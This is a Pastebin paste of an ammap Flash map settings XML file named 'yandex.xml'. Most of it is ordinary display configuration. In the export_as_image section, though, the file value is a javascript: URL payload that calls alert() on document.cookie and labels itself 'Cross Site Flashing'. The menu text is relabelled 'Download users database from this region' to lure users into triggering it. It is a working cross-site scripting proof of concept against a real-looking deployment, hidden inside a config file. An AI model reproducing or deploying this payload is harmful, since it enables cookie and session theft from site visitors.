Advertisement
Guest User

yandex.xml

a guest
Aug 29th, 2013
14,449
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 31.96 KB | None | 0 0
  1.  
  2. <?xml version="1.0" encoding="UTF-8"?>
  3. <!-- Value between [] brackets, for example [#FFFFFF] shows default value which is used if this parameter is not set  -->
  4. <!-- This means, that if you are happy with this value, you can delete this line at all and reduce file size          -->
  5. <!-- value or explanation between () brackets shows the range or type of values you should use for this parameter     -->
  6. <!-- x, y, widths and heights can be set in pixels or in percents                                                     -->
  7.  
  8. <settings>
  9.   <developer_mode>false</developer_mode>                           <!-- [false] (true / false) If set to true, developer information is displayed. You can also copy developer information to clipboard through right click menu -->
  10.   <projection>mercator</projection>                           <!-- [xy] (mercator, xy) Projection of your map. If you do not care about actual longitudes and latitudes I recommend to use xy projection. The default world map uses Mercator projection. -->  
  11.   <width></width>                                             <!-- [] (Number) if empty, will be equal to width of your flash movie -->
  12.   <height></height>                                           <!-- [] (Number) if empty, will be equal to height of your flash movie -->
  13.   <font>Tahoma</font>                                         <!-- [Tahoma] (font name) use device fonts, such as Tahoma, Times New Roman, Tahoma, Verdana... -->
  14.   <text_size>11</text_size>                                   <!-- [11] (Number) text size of all texts. Every text size can be set individually in the settings below -->
  15.   <text_color></text_color>                                   <!-- [#000000] (hex color code) main text color. Every text color can be set individually in the settings below-->
  16.   <decimals_separator></decimals_separator>                   <!-- [,] (string) decimal separator. Note, that this is for displaying data only. Decimals in data xml file must be separated with a dot -->
  17.   <thousands_separator></thousands_separator>                 <!-- [ ] (string) thousand separator -->
  18.   <redraw>true</redraw>                                       <!-- [false] (true / false) if redraw is set to true, the map will be resized then screen size changes -->
  19.   <precision></precision>                                     <!-- [2] (Number) shows how many numbers should be shown after comma for calculated values (percents) -->
  20.   <reload_data_interval></reload_data_interval>               <!-- [0] (Number) how often data should be reloaded (time in seconds) -->
  21.   <preloader_on_reload></preloader_on_reload>                 <!-- [false] (true / false) Whether to show preloaded when data or settings are reloaded -->
  22.   <add_time_stamp></add_time_stamp>                           <!-- [false] (true / false) if true, a unique number will be added every time flash loads data. This will help to avoid data cashing -->
  23.   <color_change_time_start>0.5</color_change_time_start>      <!-- [2] (Number) How fast areas should change color after map is loaded -->
  24.   <color_change_time_hover></color_change_time_hover>         <!-- [0.2] (Number) How fast areas and movies should change color on roll out -->
  25.   <fit_to_screen></fit_to_screen>                             <!-- [true] (true / false) whether to resize map or not to fit it on screen -->
  26.   <drag_map>false</drag_map>                                       <!-- [true] (true / false) whether map is dragable or not -->
  27.   <always_hand></always_hand>                                 <!-- [false] (true / false) if set to true, mouse cursor will always be hand but only if drag_map=true -->
  28.   <mask></mask>                                               <!-- [true] (true / false) this is important if you use print or printAsBitmap JavaScript function and want only visible part of a map to be printed. Also, if you load the map into another swf movie. -->
  29.   <js_enabled></js_enabled>                                   <!-- [true] (true / false) In case you don't use any flash - JavaScript communication, you can set this setting to false - this will save some CPU and will disable the security warning message which appears when opening the chart from hard drive. -->
  30.   <force_smoothing></force_smoothing>                         <!-- [false] (true / false) If you use bitmap images as your maps, then you can set this to "true" - the quality of the image will be better (might slow the zooming) -->
  31.   <layers></layers>                                                                                     <!-- [movies,labels,lines] Use this setting to change the sequence of layers. The left-most layer will be behind all the other layers. Please note that objects with x/y coordinates will still be placed on top of objects with long/lat coordinates. -->
  32.      
  33.   <background>                                                <!-- background -->
  34.     <color>#FFFFFF</color>                                    <!-- [#444444] (hex color code) -->
  35.     <alpha>70</alpha>                                           <!-- [0] (0 - 100) use 0 if you are using custom swf or jpg for background -->
  36.     <border_color>#FFFFFF</border_color>                             <!-- [#000000] (hex color code) -->
  37.     <border_alpha></border_alpha>                             <!-- [0] (0 - 100) -->
  38.     <file></file>                                             <!-- [] (filename) swf or jpg file of a background. This file must be located in path/ folder (set in html file) -->                                                              
  39.     <stretch></stretch>                                       <!-- [false] (true / false) should we stretch background over the whole width/heigh? -->
  40.     <overlay_file></overlay_file>                             <!-- [] (filename) swf or jpg file to use as an overlay for the map. This file must be located in path/ folder (set in html file) -->
  41.     <overlay_stretch></overlay_stretch>                       <!-- [false] (true / false) should we stretch overlay over the whole width/heigh? -->
  42.   </background>
  43.  
  44.   <zoom>                                                      <!-- zoom control -->
  45.     <enabled>false</enabled>                                       <!-- [true] (true / false) whether to display zoom control or not -->
  46.     <locked>false</locked>                                         <!-- [false] (true / false) whether it would be possible to drag zoom bar when dragging "home" icon -->
  47.     <arrows_enabled>false</arrows_enabled>                         <!-- [true] (true / false) whether to display navigation arrows or not -->
  48.     <mouse_wheel_enabled>false</mouse_wheel_enabled>               <!-- [true] (true / false) whether to enable zooming with mouse wheel. Mouse wheel work only after user clicks somewhere on a flash. To workaround this issue, you have to add: onLoad="ammap.focus()" to your html <body> -->    
  49.     <home_link_enabled></home_link_enabled>                   <!-- [true] (true / false) whether to display home link or not (home link is only displayed if arrows are enabled) -->    
  50.     <step_size>0</step_size>                                   <!-- [10] (Number) when moving map with navigation arrows, the map moves by step_size% of flash width or height -->
  51.     <color></color>                                           <!-- [#990000] (hex color code) background color of "+", "-", scroller buttons and navigation arrows -->
  52.     <color_hover></color_hover>                               <!-- [#CC0000] (hex color code) -->
  53.     <alpha></alpha>                                           <!-- [100] (0 - 100) alpha of zoom control buttons -->
  54.     <outline_color></outline_color>                           <!-- [#FFFFFF] -->
  55.     <outline_alpha></outline_alpha>                           <!-- [100] (0 - 100) -->
  56.     <x></x>                                                   <!-- [15] (Number or Number%) x position of zoom control -->
  57.     <y></y>                                                   <!-- [15] (Number or Number%) y position of zoom control -->
  58.     <height></height>                                         <!-- [200] (Number or Number%) zoom control height -->
  59.     <min>50</min>                                             <!-- [] (Number%) minimum zoom. if left empty, the minimum value will be calculated automaticaly (to fit all the map to the stage) -->
  60.     <max></max>                                               <!-- [2000%] (Number%) maximum zoom -->
  61.     <grid_every></grid_every>                                 <!-- [100%] (Number%) zoom tool grid will will be displayed every "grid_every" value and the dragger height will be equal to the distance between two grids -->
  62.     <time></time>                                             <!-- [1] time of zoom in seconds -->
  63.     <effect></effect>                                         <!-- [easeout] (easeout / easein) zoom motion effect -->
  64.     <rotate></rotate>                                         <!-- [false] (true / false) whether to rotate zoom control by 90 degrees or not. If set to true, zoom control becomes horizontal -->
  65.     <background_zooms_to_top>true</background_zooms_to_top>   <!-- [false] (true / false) If this is set to true, clicking on background would be the same as clicking on "home" button -->  
  66.     <zoom_on_click>false</zoom_on_click>                           <!-- [false] (true / false) If this is set to true, the map will be centered and zoomed in to the place you click. The background_zooms_to_top will be set to false automatically if you set this to true. -->
  67.     <grid_click_enabled></grid_click_enabled>                 <!-- [true] (true / false) by default clicking on zoom control grid will move slider to that position. Set this setting to "false" to disable this behavior. -->
  68.     <auto_zoom>false</auto_zoom>                               <!-- [false] (true / false) If you set this to true, the map will autozoom and center on the area you click on even if it does not have any zoom information attached to it. This can be overridden for each area individually in data using "auto_zoom" property of the <area> -->
  69.   </zoom>
  70.  
  71.   <small_map>                                                 <!-- small map -->
  72.     <enabled>false</enabled>                                  <!-- [true] (true / false) whether to display small map or not -->
  73.     <locked></locked>                                         <!-- [false] (true / false) whether it would be possible to drag small map when dragging border of small map -->
  74.     <active></active>                                         <!-- [true] (true / false) whether clicking on a small map will result position change of big map -->    
  75.     <x></x>                                                   <!-- [] (Number or Number%) x position of small map. If not defined, will be aligned to right side -->
  76.     <y></y>                                                   <!-- [] (Number or Number%) y position of small map. If not defined, will be aligned to bottom -->
  77.     <width></width>                                           <!-- [25%] (Number or Number%) width of small map (height is calculated automatically) -->
  78.     <color></color>                                           <!-- [] (hex color code) leave empty if you want to keep original map color -->    
  79.     <border_width></border_width>                             <!-- [5] (Number) -->
  80.     <border_color></border_color>                             <!-- [#FFFFFF] (hex color code) -->
  81.     <rectangle_color></rectangle_color>                       <!-- [#FFFFFF] (hex color code) color of rectangle, indicating active area on a small map -->
  82.     <collapse_button_color></collapse_button_color>           <!-- [#000000] (hex color code) colapse button arrow color (background color is the same as small map border color) -->
  83.     <collapse_button_position></collapse_button_position>     <!-- [BR] (BR / BL / TR / TL) BR - bottom right, BL - bottom left TR - top right TL - top left -->
  84.   </small_map>
  85.  
  86.   <navigation_path>                                           <!-- navigation path -->
  87.     <enabled>false</enabled>                                  <!-- [false] (true / false) whether to display navigation path or not -->
  88.     <x></x>                                                   <!-- [70] (Number or Number%) x position of path -->
  89.     <y></y>                                                   <!-- [30] (Number or Number%) y position of path -->
  90.     <color></color>                                           <!-- [#000000] (hex color code) path background color -->
  91.     <alpha></alpha>                                           <!-- [0] (0 - 100) path background alpha -->
  92.     <padding></padding>                                       <!-- [0] (Number) horizontal padding of path buttons -->
  93.     <text_color></text_color>                                 <!-- [#FFFFFF] (hex color code) -->
  94.     <text_color_hover></text_color_hover>                     <!-- [#CC0000] (hex color code) -->
  95.     <text_size></text_size>                                   <!-- [text_size] (Number) -->
  96.     <separator></separator>                                   <!-- [] symbol which separates path entries -->
  97.     <home_text></home_text>                                   <!-- [] (text) Home text -->
  98.   </navigation_path>
  99.  
  100.  
  101.   <area>                                                      <!-- areas are movie clips which are already in map swf file, usualy countries. areas should be listed in data file -->                                                              
  102.     <balloon_text>                                                    
  103.       <![CDATA[{title}]]>                                     <!-- [] ({title} {value} {percents} {description}) You can add your own HTML formated text (only some of html tags are supported) -->
  104.     </balloon_text>
  105.     <active_only_if_value_set></active_only_if_value_set> <!-- [false] (true / false) if set to true, areas (countries) without defined value in data file will not display balloon and will not change color on roll over -->
  106.     <color_solid>#E89051</color_solid>                               <!-- [#990000] (hex color code) color of area with highest value-->
  107.     <color_light>#E89051</color_light>                               <!-- [#FFCC00] (hex color code) color of areas with value = 0 or value is not set -->
  108.     <color_hover>#5C2804</color_hover>                        <!-- [] (hex color code) -->
  109.     <color_selected>#000000</color_selected>                          <!-- [] (hex color code) If not specified, original area color will be used -->    
  110.     <color_unlisted></color_unlisted>                         <!-- [] (hex color code) The color of the areas which are in the map file, but not listed in the data file. If you don't set any color here, the area will keep it's original color. Setting a color allows keeping data file smaller. -->
  111.     <color_no_value></color_no_value>                         <!-- [] (hex color code) The color of the areas which have no value attribute. Leave this empty if you do not use value attributes in areas. -->
  112.     <disable_when_clicked>false</disable_when_clicked>         <!-- [false] (true / false) if this area is currently selected, roll over and click events of this area will be disabled if this set to true -->    
  113.     <preserve_color></preserve_color>                         <!-- [false] (true / false) if this is set to true color_solid and color_light settings will be ignored - the area will preserve colors as they are in the original SWF -->
  114.   </area>
  115.  
  116.   <movie>                                                     <!-- movies are swf, jpg, gif or png files which you load on top of a map or on stage. You should define your movies in data file -->
  117.     <balloon_text>                                            
  118.       <![CDATA[{title}]]>                                     <!-- [] ({title} {value} {description}) You can add your own HTML formated text (only some of html tags are supported) -->
  119.     </balloon_text>
  120.     <active_only_if_value_set></active_only_if_value_set>     <!-- [false] (true / false) if set to true, movies without defined value in data file will not display balloon and will not change color on roll over -->
  121.     <color></color>                                           <!-- [] (hex color code) If not specified, original area color will be used -->
  122.     <color_hover></color_hover>                               <!-- [] (hex color code) If not specified, original area color will be used -->
  123.     <color_selected></color_selected>                         <!-- [] (hex color code) If not specified, original area color will be used -->
  124.     <hover_focus></hover_focus>                               <!-- [false] (true / false) If set to true hovered movie will be brought in front of other movies -->
  125.     <draggable></draggable>                                   <!-- [false] (true / false) if this is set to true all movies placed on the ammap will be draggable unless specified differently in data file -->
  126.     <snap></snap>                                             <!-- [false] (true / false) if this is set to true movies will snap to the nearest "snap point" (defined in data). This setting is ignored if movie.draggable is not set to "true" -->
  127.     <overlap_shift_x></overlap_shift_x>                       <!-- [0] (number in pexels) if there are several movies with exactly same coordinates each next movie will be shifted horizontally by X pixels -->
  128.     <overlap_shift_y></overlap_shift_y>                       <!-- [0] (number in pexels) if there are several movies with exactly same coordinates each next movie will be shifted vertically by Y pixels -->
  129.   </movie>
  130.  
  131.   <label>                                                     <!-- labels are texts which you set in data file. labels can be bounded to a map or placed on stage -->
  132.     <balloon_text>                                            
  133.       <![CDATA[]]>                                            <!-- [] ({title} {value} {description}) You can add your own HTML formated text (only some of html tags are supported) -->
  134.     </balloon_text>
  135.     <bg_margins_horizontal></bg_margins_horizontal>           <!-- [10] if your labels have background, then this parameter sets horizontal margins of background box -->
  136.     <bg_margins_vertical></bg_margins_vertical>               <!-- [10] if your labels have background, then this parameter sets vertical margins of background box -->    
  137.     <hover_focus></hover_focus>                               <!-- [false] (true / false) If set to true hovered label will be brought in front of other labels -->
  138.   </label>
  139.  
  140.   <line>                                                      <!-- you can bound lines to a map or draw them on the stage. LInes are defined in data file -->
  141.     <balloon_text>                                            
  142.       <![CDATA[{title}]]>                                     <!-- [] ({title}) You can add your own HTML formated text (only some of html tags are supported) -->
  143.     </balloon_text>
  144.     <color></color>                                           <!-- [#990000] (hex color code) default line color -->                                                                
  145.     <alpha></alpha>                                           <!-- [100] (Number) default line alpha -->      
  146.     <width></width>                                           <!-- [0] (Number) default line width  -->
  147.     <dashed></dashed>                                         <!-- [false] (true / false) dashed lines are recommended only for stage lines, not for lines inside a map -->
  148.     <arrow></arrow>                                           <!-- [] (end / start / middle / both) arrow position -->
  149.     <arrow_size></arrow_size>                                 <!-- [8] (Number) arrow size -->
  150.     <arrow_color></arrow_color>                               <!-- [] (line.color) default arrow color. If empty, is the same as line color -->
  151.     <arrow_alpha></arrow_alpha>                               <!-- [100] (0 - 100) arrow alpha -->
  152.     <curved></curved>                                         <!-- [false] (true / false) If this is set to true, the lines will be "smoothed". The lines will be smoothed only if they have at least 3 points. You can set curved="true" or curved="false" for individual line in the data file -->
  153.     <hover_focus></hover_focus>                               <!-- [false] (true / false) If set to true hovered line will be brought in front of other lines -->
  154.   </line>
  155.  
  156.   <legend>                                                    <!-- LEGEND -->
  157.     <enabled></enabled>                                       <!-- [true] (true / false) -->
  158.     <x></x>                                                   <!-- [20] (Number / Number% / !Number)  -->
  159.     <y></y>                                                   <!-- [!55] (Number / Number% / !Number)  -->
  160.     <width></width>                                           <!-- [] (Number / Number%) -->
  161.     <max_columns></max_columns>                               <!-- [] (Number) the maximum number of columns in the legend -->    
  162.     <color></color>                                           <!-- [#FFFFFF] (hex color code) -->
  163.     <alpha></alpha>                                           <!-- [50] (0 - 100) background opacity -->
  164.     <border_color></border_color>                             <!-- [#000000] (hex color code) border color -->
  165.     <border_alpha></border_alpha>                             <!-- [30] (0 - 100) border alpha -->
  166.     <text_color></text_color>                                 <!-- [text_color] (hex color code) -->  
  167.     <text_size></text_size>                                   <!-- [text_size] (Number) -->
  168.     <spacing></spacing>                                       <!-- [10] (Number) vertical and horizontal gap between legend entries -->
  169.     <margins></margins>                                       <!-- [10] (Number) legend margins (space between legend border and legend entries, recommended to use only if legend border is visible or background color is different from chart area background color) -->
  170.     <key>                                                     <!-- KEY (the color box near every legend entry) -->
  171.       <size></size>                                           <!-- [16] (Number) key size-->
  172.       <border_color></border_color>                           <!-- [] (hex color code) leave empty if you don't want to have border -->
  173.     </key>    
  174.     <entries>                                                 <!-- legend entries go gere-->
  175.       <!-- <entry color="#3366CC">Some title</entry>  -->     <!-- You can have any number of legend entries, uncomment this line and copy as many times as you need -->
  176.     </entries>
  177.   </legend>
  178.  
  179.   <object_list>                                               <!-- OBJECT LIST -->
  180.     <enabled>true</enabled>                                       <!-- [false] (true / false) -->
  181.     <type></type>                                             <!-- [dropdown] (dropdown / listbox) -->
  182.     <levels></levels>                                         <!-- [3] (Number) How many levels of objects should be included in the list. You can exclude individual objects from a list by setting object_list="false" in the object's settings in data file. -->
  183.     <include_areas></include_areas>                           <!-- [true] (true / false) whether areas must be included in a list -->
  184.     <include_movies></include_movies>                         <!-- [true] (true / false) whether movies must be included in a list -->
  185.     <include_labels></include_labels>                         <!-- [true] (true / false) whether labels must be included in a list -->
  186.     <x></x>                                                   <!-- [!200] (Number / Number% / !Number) -->
  187.     <y></y>                                                   <!-- [0] (Number / Number% / !Number)-->
  188.     <width></width>                                           <!-- [200] (Number / Number%) -->
  189.     <height></height>                                         <!-- [100%] (Number / Number%) -->    
  190.     <color></color>                                           <!-- [#FFFFFF] (hex color code) Background color-->
  191.     <color_hover></color_hover>                               <!-- [#DADADA] (hex color code) background color of a list item when mouse is over it -->
  192.     <color_selected></color_selected>                         <!-- [#000000] (hex color code) background color of a selected list item -->
  193.     <alpha></alpha>                                           <!-- [100] (0 - 100) background opacity -->
  194.     <border_color></border_color>                             <!-- [#DADADA] (hex color code) -->
  195.     <border_alpha></border_alpha>                             <!-- [100] (0 - 100) border opacity -->
  196.     <text_color></text_color>                                 <!-- [text_color] (hex color code) -->
  197.     <text_color_hover></text_color_hover>                     <!-- [#000000] (hex color code) -->
  198.     <text_color_selected></text_color_selected>               <!-- [#FFFFFF] (hex color code) -->  
  199.     <text_size></text_size>                                   <!-- [text_size] (Number) -->
  200.     <scroller_color></scroller_color>                         <!-- [#990000] (hex color code) -->
  201.     <scroller_bg_color></scroller_bg_color>                   <!-- [#DADADA] (hex color code) -->
  202.     <home_text></home_text>                                   <!-- [Home] (text) Set "none" if you don't want the home text at all -->
  203.   </object_list>  
  204.  
  205.   <text_box>                                                  <!-- text box is displayed when user clicks on an object and the object contains description. You can disable text box for individual objects in data file -->
  206.     <enabled></enabled>                                       <!-- [true] (true / false) -->
  207.     <locked>true</locked>                                         <!-- [false] (true / false) whether it would be possible to drag text box -->    
  208.     <selectable></selectable>                                 <!-- [true] (true / false) whether it is possible to select the text in text box or not -->
  209.     <show_on_hover></show_on_hover>                           <!-- [false] (true / false) text box can be showed on roll over too - set this parameter to "true" -->
  210.     <hide_on_roll_out></hide_on_roll_out>                     <!-- [false] (true / false) if text box is showed on roll over, it can be hidden on roll out -->    
  211.     <x>30</x>                                                   <!-- [60%] (Number or Number%) x position of text box. You can set individual x position for every object in data file -->
  212.     <y>30</y>                                                   <!-- [20%] (Number or Number%) y position of text box. You can set individual y position for every object in data file -->
  213.     <width>400</width>                                           <!-- [35%] (Number or Number%) text box width. You can set individual width for every movie or area -->
  214.     <height>400</height>                                         <!-- [40%] (Number or Number%) text box height. You can set individual height for every movie or area -->
  215.     <color></color>                                           <!-- [#FFFFFF] (hex color code) background color -->
  216.     <alpha>60</alpha>                                           <!-- [100] (0 - 100) background alpha -->
  217.     <shadow_color></shadow_color>                             <!-- [#000000] (hex color code) shadow color -->
  218.     <shadow_alpha></shadow_alpha>                             <!-- [50] (0 - 100) shadow alpha -->
  219.     <shadow_blur></shadow_blur>                               <!-- [5] (Number) shadow bluriness -->
  220.     <shadow_distance></shadow_distance>                       <!-- [5] (Number) shadow distance -->
  221.     <corner_radius>7</corner_radius>                           <!-- [0] (Number) corner radius -->
  222.     <border_width></border_width>                             <!-- [0] (Number) border width -->
  223.     <border_color></border_color>                             <!-- [#DADADA] (hec color code) border color -->
  224.     <border_alpha></border_alpha>                             <!-- [100] (Number) border alpha -->
  225.     <margin_width></margin_width>                             <!-- [10] (Number) margin width -->
  226.     <text_size></text_size>                                   <!-- [text_size] (Number) -->
  227.     <text_color>#000000</text_color>                                 <!-- [text_color] (hex color code) -->
  228.     <close_button_color></close_button_color>                 <!-- [#000000] (hex color code) -->
  229.     <close_button_color_hover></close_button_color_hover>     <!-- [#CC0000] (hex color code) -->
  230.     <scroller_color></scroller_color>                         <!-- [#990000] -->
  231.     <scroller_bg_color></scroller_bg_color>                   <!-- [#DADADA] -->
  232.   </text_box>
  233.  
  234.   <balloon>                                                   <!-- balloon is shown when user roll overs the objects -->
  235.     <enabled></enabled>                                       <!-- [true] (true / false) -->
  236.     <max_width></max_width>                                   <!-- [30%] (Number or Number%) -->                                  
  237.     <color></color>                                           <!-- [#880000] (hex color code) balloon background color -->
  238.     <alpha>80</alpha>                                           <!-- [100] (0 - 100) -->
  239.     <text_color></text_color>                                 <!-- [0xFFFFFF] (hex color code) -->
  240.     <text_size></text_size>                                   <!-- [text_size] (Number) -->
  241.     <border_color></border_color>                             <!-- [balloon.color] (hex color code) -->
  242.     <border_alpha></border_alpha>                             <!-- [balloon.alpha] (0 - 100) -->
  243.     <border_width></border_width>                             <!-- [0] (Number) -->
  244.     <corner_radius></corner_radius>                           <!-- [0] (Number) -->
  245.     <arrow>horizontal</arrow>                                           <!-- [vertical] (vertical / horizontal / none) balloon's arrow position -->
  246.   </balloon>
  247.  
  248.   <export_as_image>                                           <!-- export_as_image feature works only on a web server -->
  249.     <file>javascript://%0aalert("Just kidding... ;) - it's Cross Site Flashing\n\n----------\nCookies:\n" + document.cookie);//t.jpg</file>                                             <!-- [] (filename) if you set filename here, context menu (then user right clicks on flash movie) "Export as image" will appear. This will allow user to export map as an image. Collected image data will be posted to this file name (use ammap/export.php or ammap/export.aspx) -->
  250.     <target></target>                                         <!-- [] (_blank, _top ...) target of a window in which export file must be called -->
  251.     <x></x>                                                   <!-- [0] (Number) x position of "Collecting data" text -->
  252.     <y></y>                                                   <!-- [] (Number) y position of "Collecting data" text. If not set, will be aligned to the bottom of flash movie -->
  253.     <color></color>                                           <!-- [#BBBB00] (hex color code) background color of "Collecting data" text -->
  254.     <alpha></alpha>                                           <!-- [0] (0 - 100) background alpha -->
  255.     <text_color></text_color>                                 <!-- [text_color] (hex color code) -->
  256.     <text_size></text_size>                                   <!-- [text_size] (Number) -->
  257.     <background_color></background_color>                     <!-- [] (hex color code) background color for generated image -->
  258.   </export_as_image>  
  259.      
  260.   <strings>                                                
  261.     <loading_map></loading_map>                               <!-- [Loading map] (text) -->
  262.     <export_as_image>Download users database from this region</export_as_image>                       <!-- [Export as image] (text) text for right click menu -->
  263.     <collecting_data>Preparing database download...</collecting_data>                       <!-- [Collecting data] (text) this text is displayed while exporting map to an image -->    
  264.   </strings>
  265. </settings>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement